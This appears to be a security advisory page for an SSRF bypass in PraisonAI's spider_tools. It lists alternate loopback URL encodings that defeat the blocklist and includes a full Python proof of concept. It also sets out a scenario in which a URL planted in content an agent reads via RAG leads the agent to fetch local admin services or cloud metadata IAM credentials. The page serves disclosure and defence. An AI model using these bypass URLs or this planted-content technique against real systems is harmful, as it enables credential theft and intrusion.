PraisonAI's spider_tools implements SSRF protection using an exact-string blocklist that fails to normalize alternate loopback representations — decimal integers, octal notation, hex, and trailing-dot variants all bypass the check and reach localhost-bound services. In agentic deployments where user-controlled or LLM-generated URLs are passed to scrape_page() or crawl(), an attacker can exfiltrate responses from local admin panels, cloud metadata endpoints (169.254.169.254), or any service bound exclusively to loopback. With 69 prior CVEs in this package and SSRF being a well-understood cloud pivot technique, the exploitation bar is low once an attacker has influence over agent inputs — a realistic condition in RAG pipelines or multi-agent workflows. Upgrade to praisonai 4.6.40 or praisonaiagents 1.6.40 immediately; if patching is delayed, add egress firewall rules blocking loopback and RFC-1918 ranges at the network layer.
What is the risk?
Medium severity by CVSS (5.5), but contextually elevated for cloud-deployed AI agents. The vulnerability bypasses an explicit security control rather than exploiting a default-open behavior, creating false confidence in developers who believe SSRF protection is active. EPSS data unavailable; no active exploitation observed and not in CISA KEV. Blast radius is modest with 1 reported downstream dependent, but any PraisonAI deployment processing externally-influenced URLs is directly in scope. The local-attack-vector CVSS classification likely reflects standalone desktop use; in containerized or cloud agent deployments, effective exploitability is higher since the attack can be initiated remotely through agent task inputs.
Attack Kill Chain
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI | pip | <= 4.6.39 | 4.6.40 |
| praisonaiagents | pip | <= 1.6.39 | 1.6.40 |
Severity & Risk
Attack Surface
What should I do?
4 steps-
Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40.
-
Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments.
-
If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation — never compare raw hostname strings against a blocklist.
-
Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-47390?
PraisonAI's spider_tools implements SSRF protection using an exact-string blocklist that fails to normalize alternate loopback representations — decimal integers, octal notation, hex, and trailing-dot variants all bypass the check and reach localhost-bound services. In agentic deployments where user-controlled or LLM-generated URLs are passed to scrape_page() or crawl(), an attacker can exfiltrate responses from local admin panels, cloud metadata endpoints (169.254.169.254), or any service bound exclusively to loopback. With 69 prior CVEs in this package and SSRF being a well-understood cloud pivot technique, the exploitation bar is low once an attacker has influence over agent inputs — a realistic condition in RAG pipelines or multi-agent workflows. Upgrade to praisonai 4.6.40 or praisonaiagents 1.6.40 immediately; if patching is delayed, add egress firewall rules blocking loopback and RFC-1918 ranges at the network layer.
Is CVE-2026-47390 actively exploited?
No confirmed active exploitation of CVE-2026-47390 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-47390?
1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40. 2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments. 3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation — never compare raw hostname strings against a blocklist. 4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.
What systems are affected by CVE-2026-47390?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, RAG pipelines, web scraping agents, multi-agent pipelines.
What is the CVSS score for CVE-2026-47390?
CVE-2026-47390 has a CVSS v3.1 base score of 5.5 (MEDIUM).
AI Security Impact
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0049 Exploit Public-Facing Application AML.T0051.001 Indirect AML.T0053 AI Agent Tool Invocation AML.T0086 Exfiltration via AI Agent Tool Invocation Compliance Controls Affected
Technical Details
Original Advisory
### Summary PraisonAI's `spider_tools` URL validation can be bypassed using alternate loopback host encodings. The affected component is: ```text praisonaiagents/tools/spider_tools.py ```` The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as `localhost` and `127.0.0.1`. It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request. As a result, URLs such as the following bypass the protection and still reach loopback services: ```text http://localhost.:8765/ http://127.1:8765/ http://0177.0.0.1:8765/ http://0x7f000001:8765/ http://2130706433:8765/ ``` After the weak validation passes, `scrape_page()` calls `requests.Session.get()` on the attacker-controlled URL. This allows an attacker who can influence URLs passed to `scrape_page`, `crawl`, or `extract_text` to induce SSRF requests against loopback-only services. This is a server-side request forgery protection bypass. ### Details The affected code is in: ```text praisonaiagents/tools/spider_tools.py ``` The vulnerable flow is: ```text attacker-controlled URL -> spider_tools._validate_url(...) -> weak exact-host blocklist check -> validation passes for alternate loopback encodings -> scrape_page(...) -> requests.Session.get(attacker_url) -> loopback service is reached ``` The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as: ```text localhost 127.0.0.1 ``` However, equivalent loopback forms are not rejected before the request is made. Confirmed bypass examples: ```text http://localhost.:8765/ http://127.1:8765/ http://0177.0.0.1:8765/ http://0x7f000001:8765/ http://2130706433:8765/ ``` These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation. The issue is not that `spider_tools` can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses. ### PoC The following PoC is non-destructive. It starts a local HTTP server on `127.0.0.1:8765`, then sends several alternate loopback URL forms through the real `spider_tools` validation/fetch path. The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made. The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server. #### Full PoC ```python #!/usr/bin/env python3 """PoC for PraisonAI spider_tools localhost-alias SSRF bypass.""" from __future__ import annotations import sys import threading from http.server import BaseHTTPRequestHandler, HTTPServer from pathlib import Path REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai" AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents" SPIDER_TOOLS = AGENTS_ROOT / "praisonaiagents/tools/spider_tools.py" def verify_source() -> None: expected = [ "def _validate_url", "requests.Session", ".get(", ] text = SPIDER_TOOLS.read_text(encoding="utf-8") for needle in expected: if needle not in text: raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER_TOOLS}") class LocalHandler(BaseHTTPRequestHandler): hits: list[tuple[str, str | None]] = [] body = b"LOCAL-SPIDER-SSRF-SECRET" def do_GET(self) -> None: # noqa: N802 self.__class__.hits.append((self.path, self.headers.get("Host"))) self.send_response(200) self.send_header("Content-Type", "text/plain") self.send_header("Content-Length", str(len(self.body))) self.end_headers() self.wfile.write(self.body) def log_message(self, format: str, *args) -> None: # noqa: A003 return def main() -> int: if not SPIDER_TOOLS.exists(): raise SystemExit("missing local PraisonAI source tree") verify_source() sys.path.insert(0, str(AGENTS_ROOT)) # Import the real shipped implementation. # # Depending on the exact public API exposed by spider_tools.py, # use the exported scrape function available in the local version. # The important path is: # # _validate_url(url) # -> requests.Session.get(url) # import praisonaiagents.tools.spider_tools as spider_tools server = HTTPServer(("127.0.0.1", 8765), LocalHandler) thread = threading.Thread(target=server.serve_forever, daemon=True) thread.start() candidates = [ "http://localhost.:8765/", "http://127.1:8765/", "http://0177.0.0.1:8765/", "http://0x7f000001:8765/", "http://2130706433:8765/", ] try: for url in candidates: LocalHandler.hits.clear() try: # Prefer the real public scraping API when available. if hasattr(spider_tools, "scrape_page"): result = spider_tools.scrape_page(url) elif hasattr(spider_tools, "extract_text"): result = spider_tools.extract_text(url) elif hasattr(spider_tools, "crawl"): result = spider_tools.crawl(url) else: raise RuntimeError("No expected spider_tools public fetch function found") reached = bool(LocalHandler.hits) contains_secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result) print(f"{url} passed=True reached_loopback={reached} contains_secret={contains_secret}") if not reached: raise SystemExit(f"[poc] MISS: {url} did not reach loopback server") except Exception as exc: print(f"{url} blocked_or_failed={type(exc).__name__}: {exc}") raise finally: server.shutdown() server.server_close() thread.join(timeout=1) print("[poc] HIT: alternate loopback URL forms bypassed spider_tools SSRF protection") return 0 if __name__ == "__main__": raise SystemExit(main()) ``` #### Confirmed local result The following bypasses were confirmed locally: ```text localhost. True ok ok local hit 127.1 True ok ok local hit 0177.0.0.1 True ok ok local hit 0x7f000001 True ok ok local hit 2130706433 True ok ok local hit ``` This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service. #### Expected secure behavior All loopback-equivalent addresses should be blocked before the HTTP request is made. Examples that should be rejected: ```text http://localhost/ http://localhost./ http://127.0.0.1/ http://127.1/ http://0177.0.0.1/ http://0x7f000001/ http://2130706433/ http://[::1]/ ``` #### Actual vulnerable behavior Several alternate loopback representations pass validation and are fetched by the tool. ### Impact An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services. Potential impact includes: * SSRF against localhost-only admin panels or development servers; * access to local HTTP services that are not intended to be reachable remotely; * retrieval of local service responses into the agent/tool output; * possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment. The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings. This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.
Exploitation Scenario
An adversary embeds a crafted URL in content indexed by a PraisonAI agent's RAG pipeline or a web page being crawled — for example, a page containing a link using http://2130706433:8080/admin. When the agent processes this content and invokes scrape_page() to follow the URL, the weak string-based validation approves the decimal-encoded loopback address, and requests.Session issues a GET to the local admin service. The server response — containing configuration data, session tokens, or internal API credentials — is returned as tool output to the agent, where it may be logged, embedded in agent context, or surfaced to the requesting user. In a cloud environment, substituting the metadata service path (http://2130706433/latest/meta-data/iam/security-credentials/) yields IAM credentials for the underlying host instance.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N References
Timeline
Related Vulnerabilities
CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonai GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonai CVE-2026-39890 9.8 PraisonAI: YAML deserialization enables unauthenticated RCE
Same package: praisonai GHSA-9qhq-v63v-fv3j 9.8 PraisonAI: RCE via MCP command injection
Same package: praisonai CVE-2026-47410 9.8 praisonai-platform: hardcoded JWT → full account takeover
Same package: praisonai